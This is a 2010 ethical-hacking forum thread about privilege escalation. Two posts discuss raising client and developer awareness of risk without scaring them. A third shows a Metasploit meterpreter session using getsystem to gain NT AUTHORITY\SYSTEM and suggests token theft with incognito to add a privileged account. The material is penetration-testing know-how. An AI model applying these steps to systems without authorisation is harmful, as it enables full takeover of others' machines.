The Ethical Hacker Network - Privilege excalation

sil

Hero Member

Offline

Posts: 549

Re: Privilege excalation

« Reply #15 on: August 23, 2010, 07:42:13 PM »

Quote from: H1t M0nk3y on August 23, 2010, 03:23:12 PM

As long as you can scare your clients, you know/hope they will fix their things.

It's never about "scaring" clients believe it or not. Raising awareness to them goes a hell of a lot longer. Most clients nowadays are aware of the risks but won't fully understand the extent of them.

Today I had to sit through a presentation with the owner of my company and a "Tony Robbins" like salescoach (for lack of better explanation) and explain to him in not-so-technical terms what it is I can do (we as a company). I explained to him briefly the differences in extrusion and intrusion detection systems fail as do firewalls. I had to tone it down to make things understood (the risks).

After explaining it to him, he sort of got it but was shocked at the speed at which I could get into machines/networks. Now, this doesn't make me "uberhacker" on the contrary I could say it makes some clients, uberlackingincommon sense. Take a look at a vast majority of what people are calling "insider threats." Does someone clicking on a loaded link (backdoored pdf, doc, html link etc) constitute an insider attack? You bet it down. Remember a reverse shell is someone connecting TO THE attacker. Kiss your firewall goodbye (when done properly.)

Awareness goes a long way. Client's don't want to be scared and its not where you want them to be. Scared people don't think straight Wink

Besides they've already heard this routine time and time again: "Buy this firewall, guaranteed to stop...", "Oh you need this shiny sparkly blinky-light IPS", "What you really need is DLP" and the list goes on. What people REALLY need is awareness. Expressing this to a client is guaranteed to always keep you in mind with them.

Think about that for a bit... If it were you and you were speaking to say a family member, friend, colleague, golfing buddy etc., would you remember someone who scared you or someone who made you think in a more positive light?


	Logged

http://www.infiltrated.net/mgz/puppylecter.jpg

H1t M0nk3y

Hero Member

Offline

Posts: 864

Re: Privilege excalation

« Reply #16 on: August 23, 2010, 08:54:12 PM »

Sorry sil for my previous post. Engligh isn't my mother tongue and although I rare use this as an excuse, I really made a mistake.

I think exactly like you. I hate scaring people because, like you said, they start acting in panic mode. They also start to look at you with doubts. So I am sorry for what I wrote, I didn't mean that at all.

But again, we do different things. While you are a pentester, I work more with developers. They may not be IT security experts, but most of them can handle some technical stuff. They may not know the difference between a bind and a reverse shell, but they know it's a shell.

When you show to a developer that, for example, you were able to get a shell on the server through SQL injection because they didn't validate user input, they get scared! They understand enough to be scared.

So I really meant that, once you can demonstrate to them the risks associated with their action, and they realize the impact of these risks (and therefore, their actions), then they become aware like you said (and some scared a bit I guess).

But you are right, if I go see a car mechanic and he tells me: "You are crazy driving this car with almost no breaks. See how close you came to kill your family!!!", I wouln'd like it. I would much prefer him to tell me: "You really need to consider fixing your break ASAP. Here's how we can do it".

Thanks sil for explaining me you point so nicely! Wink


	Logged

OSCP, GPEN, GWAPT, GSEC, CEH, CISSP

Jhaddix

Sr. Member

Offline

Posts: 317

Re: Privilege excalation

« Reply #17 on: August 28, 2010, 06:19:28 AM »

Also if we're talking network level shell (not webapp/php/etc) Metasploit has some built in privilege escalation exploits in the priv module (meterpreter) and after patch tues a few weeks ago more should be coming Wink

Code:

meterpreter > use priv
Loading extension priv…success.

meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:

-h Help Banner.
-t The technique to use. (Default to ‘0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)

meterpreter > getsystem -t 1
…got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Also, Depending on your specific permission level you can use incognito to token steal from a domain admin or user and add a new account for yourself with higher privs.


	Logged

GSEC, GPEN, GWAPT, ECPPT, WAHHlive, LSOAdvancedPenTester

http://www.securityaegis.com
http://www.pentesterscripting.com
http://code.google.com/p/pentest-bookmarks/

Pages: 1 [2] Go Up

« previous next »